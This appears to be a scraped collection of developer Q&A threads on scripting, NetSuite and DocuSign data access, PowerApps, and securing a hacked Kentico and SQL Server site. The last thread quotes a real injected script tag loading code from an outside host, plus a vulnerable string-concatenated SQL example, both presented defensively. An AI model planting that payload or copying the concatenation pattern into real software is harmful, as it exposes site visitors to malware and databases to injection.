client scripting vs server scripting - scripting

What is the difference between client side scripting and server side scripting?
I know that with server scripting a link will create a dynamic page based on a number of conditions, usually within PHP. I also know that with client side scripting all the code is already on the user's browser and that the page will alter based on the user's input.
Are there any other tidbits of knowledge on this that anyone can offer me?

Client side scripts can be manipulated by the user, you do not have access to a database, it may cause different results in different clients... There are a lot of differences. Do you have any specific questions?

Related

Where to start with DB2 and Docusign integration

I'm in the fact finding stage of an integration project to update DocuSign vendor agreements with status flags in our DB2 construction management software.
I'm a SQL developer that was handed this task, and I know nothing about DocuSign schemas or its APIs.
Has anyone done anything like this before?
A good place to start is the DocuSign quickstart.
While you may use DB2 for your database, you will still need to run some code on the server in some form of server language like C#, Java etc. You can pick one of 8 languages in the quickstart, see how the APIs work, what data you need and how you may design your system accordingly.

Which software/framework to use to create App for Call Calibration for Quality Dept

I'm not sure if this is the right place to ask this question. If not, please direct me to the right place.
We used to have an application that was created using VB and Microsoft Access. It was an application to score calls from Agents and would then run a few calculations and grade those agents based on a few algorithms.
We replicated all that Access data onto SQL but for some reason, we were just not able to connect the VB application to the SQL Database instead. The application was also outdated and we needed a change.
Can anyone suggest software/framework that can be used to create a new application with an ability to connect to a SQL database?
EDIT: We have a Microsoft Office 365 subscription. I was thinking of using PowerApps. I've never used it before. Does anyone think this could help serve my purpose?
I have extensive experience of using PowerApps to create applications connected to SQL Server (in my case Azure SQL Database), and am mostly satisfied.
There are some constraints, but not major. Please see these posts for some further information.
I would suggest PowerApps if you have Office365.

How do I access netsuite data using SQL language

A company uses NetSuite to make purchase orders and store sales information. The only way this company is able to access this information at the moment is through building NetSuite reports.
Is there a way SQL language could be written to access the NetSuite data? Some of the questions asked by the business need something a bit more complex than what NetSuite reporting provides, and sound very easy using SQL language.
I have experience in Oracle, MySQL, and many other SQL languages, so I would like to know how to set up a connection to the company's NetSuite data so I can help write custom queries.
Netsuite has SuiteAnalytics Connect, which is ODBC. It can be downloaded from a link at the very bottom of the home screen of your Netsuite account.
After installation of the application bundle and connecting it to your Netsuite, you can write ORACLE SQL queries via Excel, Access, etc. My experience is that Netsuite uses Oracle SQL in ODBC queries and in Saved Search custom queries.
The way I understand it, the ODBC driver is a separately priced item from NetSuite. Once you have that, you could use Excel, Access, Crystal Reports or anything else that can use the ODBC driver to read the data and write queries against it.
The normal way to access NetSuite data is with SuiteScript -- javascript code that uses the nlapi* calls to get to the data.
You can access Netsuite backend using a number of different tools and it allows running Oracle SQL directly.
Netsuite provides JDBC, ADO.NET and ODBC if it was included in your licensing purchase. You can find the downloads from the main menu - lower left hand of the screen in Settings - Set Up SuiteAnalytics Connect.
ADO.net however is pretty worthless in SSIS as it doesn't allow parameter mapping or SQL from a variable value. I have yet to get the ODBC driver to work correctly - it can connect and show columns of a table but it won't validate saying "The ODBC Source.Outputs[ODBC Source Error Output].Columns[...] on the error output has properties that do not match the properties of its corresponding data source column."
The other options I'm looking into are Cozyroc and KingswaySoft adapters for Netsuite. You could also do SOAP or REST connections if desired.
I've not used this, but as of 2014.2 there should be an ODBC driver available for read access.
http://www.netsuite.com/portal/landing/2014-2/suiteanalytics.shtml
As previously mentioned, if you have it licensed you can download the ODBC driver from the Netsuite application. I tested some other adapters but found Netsuite's at least as good as the competitors and they provide timely security updates to the drivers as well as both 64 and 32 bit versions.
There are also metadata browsers that are on the net (example is URL below), the type of browser being based on which kind of access you are looking at (web services, versus ODBC, etc).
https://system.sandbox.netsuite.com/help/helpcenter/en_US/srbrowser/Browser2017_2/odbc/record/account.html
Within the application GUI there is information you need to connect using their ODBC connection (you need the account id and the role id). The URL is just odbcserver.xxxx.netsuite.com where xxx is specific to the environment you are accessing. Note that other adapters such as Cozyroc, etc. require the admin to set up connections in Netsuite for those.
Here is a list of the main metadata tables:
OA_FKEYS
OA_TABLES
OA_COLUMNS
In addition, note that the URL above does NOT include customization. Plus it's not easily consumed by automation tools. But Netsuite provides a set of metadata views within the repository which you can use ODBC to pull from, which includes all keys - foreign and primary. AND it does include customizations! I built a simple set of ETL jobs that use the standard ADO.NET driver within SSIS and the ODBC DSN to pull all the metadata and then use BIML to automatically generate all the extract ETL and related staging tables. You can also easily then use the metadata to detect changes in the underlying database.
Let me know if I can be any help with doing any of this.
There are 3rd party tools, like CData ODBC Adapter for NetSuite: http://www.cdata.com/drivers/netsuite/odbc/ . This tool allows you to run standard SQL against the NetSuite API. Note that the NetSuite API presents a very different data model from that of the native NetSuite ODBC.
With this tool, you install it onto your machine (Win in my case) and then after you configure the driver, you can run SQL against it (the driver config is where you specify your NS credentials, etc.).
It revolutionizes access to NetSuite data IMHO.
Download the Netsuite ODBC drivers, set up your DSN locally with server/credentials, and use SSIS pkgs to automate data extract and load onto your local DB. Use ADO.NET drivers if preferred. Then utilize those tables to create/deliver your complex reports using SQL (stored procedures) and Reporting Services. This will require SQL Standard license at minimum though.
Only API calls can access the NetSuite data.
You can't access Netsuite data using sql language.
The only way to gain access to Netsuite from third party systems is to use SOAP request or PHP toolkit.

Users to fetch files remotely

I am using ADO to connect to an access database from an excel spreadsheet using code written in vb. The spreadsheet allows someone to retrieve files stored locally on my machine according to what they enter in certain cells and from interrogating the database. This has worked well which presents the frightening prospect of me now feeling encouraged!...
It is my wish to give a copy of my spreadsheet to people but retain the files and database on my own computer or a dedicated server. (I do not want the users to be able to access anything other than a view onto the data or the files that I allow them to access.) I totally appreciate there are a myriad of alternative technologies that I could and might need to achieve this. But I really am quite a simpleton and would like to be able to simply amend my connection string with something that uses an IP address, and similarly with the files. Is this even possible? Can someone advise me where to even start looking for a solution if it is not? I've browsed through stuff on VPNs, application servers, ASPs etc. without even knowing if it is relevant and, as I say, I need the dumbster's solution. I'm happy to read - but what... should I look at VB.net?
A VPN would allow a similar setup to what you have now inasmuch as you would need to modify the connection string and file paths (to network share paths) but has drawbacks:
Users/you would need to configure a VPN client
Your machine would be the host so would need to be always-on with sufficient bandwidth
Users would be logging on to your machine so you would need to manage access rights/security
This is difficult to scale and a pain to manage, which is something that is also true of attempting to serve Access content over the internet.
A more standard way to do this would be to:
Get an ASP.NET hosting account with SQL Server support (or set this up on your machine)
Migrate the Access data to SQL Server (which unlike Access is specifically designed to support multiple users over a network)
Update your VBA connection string and make any required changes to your SQL
Create an ASP page that reads the files stored on the server and returns their content
Modify the code you have that loads files from disk to instead query this ASP page over HTTP and read its contents
Retaining Access, you could also create an ASP page that executes queries, reads the data and converts it to XML returned to your spreadsheet for processing.

How to protect my ASP.NET site and my SQL Server from hacking?

My site is created in Kentico CMS 5.5 and SQL Server 2008. It's running successfully, but these days a hacker hacked my site, and after a long time I found that in many of the tables the hacker added the
></title><script src="http://lilupophilupop.com/sl.php"></script><!--
line before every varchar cell. Suppose I have a user table: in that case it adds this string before the username, and before the user's email ID it adds this same string. How can I protect my SQL Server from this hacking? And what is the reason behind this?
How can I protect my SQL Server from this hacking?
First, you need to find out how the hacker got the data into your database (SQL injection, weak account password, ...). Then you can take appropriate actions.
And what is the reason behind this?
The hacker hopes that the varchar field is printed on a web page without being properly encoded first. If that happens, the user's browser will download and execute the script.
This looks like it could be an 'SQL Injection' attack, probably aimed at sending your visitors to a malware or fraudulent site.
Unfortunately, as Kentico CMS is commercial software your options are limited. You won't have the source that you can tweak to prevent further attacks coming through the front end.
You may need to
Review the security of your SQL server and ensure that the attacker didn't connect to it directly
Update to the latest security patch for the CMS (if you pay for maintenance it's free)
Get support from Kentico, they may have seen this before
Clean up your data and remove the offending scripts
If none of that is successful you may be able to add triggers to the necessary tables in SQL to remove the scripts as they are inserted in the database.
You need to follow the industry best practices: look at
https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
For the top 10 Web application security risks.
A few things to keep in mind that save your database from hacking are given below:
Always use parametrized SQL, pass all values to DB using parametrized query
SqlCommand cmd = new SqlCommand("SELECT * FROM TableName WHERE ID = @ID");
cmd.Parameters.AddWithValue("@ID", value); // bind the value instead of concatenating it
Not
SqlCommand cmd = new SqlCommand("SELECT * FROM TableName WHERE ID = " + value + "");
Similarly, use INSERT, UPDATE, and DELETE query, or use STORED PROCEDURE in same manner.
Only set permission to your specific user
You can turn ValidateRequest on/off in your page/web.config file as required.
Set validation on both client and server side so that only valid data will pass to DB
Use an appropriate data type in your column rather than using a common data type (say VARCHAR)
Thanks
I agree with @Heinzi - you should make an effort to figure out the attack vector (how the baddie got into your application). You've found text in your database, but how did it get there? Directly via Sql Server or through the web server OR through Kentico? As you go through this investigative process, make notes of where your security is weak, and firm it up as you go - you're essentially doing a security audit! Doing these steps will lead you to harden your servers against most sorts of attacks, hopefully preventing this sort of thing from happening to you again.
I don't know anything about your topology (how your servers are set up and connected to each other and the web), but we can make a start at investigating by looking into the windows log of the machine your sql server is installed on - look for logins happening at times that are questionable, look for odd user accounts, and examine your password and username security. Get more details of things to look into here: Windows Intruder Detection Checklist
If that doesn't turn up anything, look at the Sql server logs, and review your username/password security AND the access to the sql server instance; eg: the sql server should only be accessible from machines that have an explicit reason - your web server, maybe a network admin box, etc - use Windows Firewall to make the access 'tight', so that the sql server instance doesn't just respond to any computer asking. - Here's more details about how to secure sql server.
Check the web.config on your webserver - is the sql server username and password there? Check your ftp logs to see if anyone's tried to read it recently.
Kentico versions 5+ (and maybe earlier) come with the ability to log 'events'. If you have event logging turned on, you should be able to see your templates being modified; go to Site Manager > Administration > Event Log and go back to the date when you first noticed it, and examine the entries for what user account was doing the modifications.
Or even better: if you have access to the db server, you can do a direct table query to get at this data:
SELECT TOP 1000 *
FROM [CMS_EventLog]
Look again for entries that seem to happen at odd times from weird IP addresses or usernames.
And again, it's better to restrict access to all 'sensitive' resources (the Database, Kentico cmsdesk and siteadmin) as best you can. Windows Firewall is pretty great at doing this - tighten down Remote Desktop access, and close as many ports as you can to reduce your servers' exposed surface area. Test your exposure using something as simple as Shields Up! from Gibson Research or the Awesome Nmap security scanner tool.
As an example, my web servers only publicly expose ports 80 and 443 (http and https), and maybe a random high port like 4456 for Ftp if it's needed. I use Windows Firewall to restrict access to Remote Desktop to a handful of IP addresses. The Sql servers have NO public ports, they are tuned to 'stealth' and not reply to any request from a non-authorized IP.
As an anecdotal example - when I put a server live, it has taken as little as 8 hours before bots start trying to log in via remote desktop (you can see thousands of failed attempts in the windows Event Log > security) - as soon as you use windows firewall to ignore non-approved IP addresses, the log stays clear.
As a helpful note: if you are not experienced doing this sort of thing, you may want to procure the services of an experienced Windows system administrator to help you. And please realize that there may be more compromised systems - you may have just found the 'tip of the iceberg', there could be Trojans and Rootkits and other nasties waiting, so you'll need a full security scan too.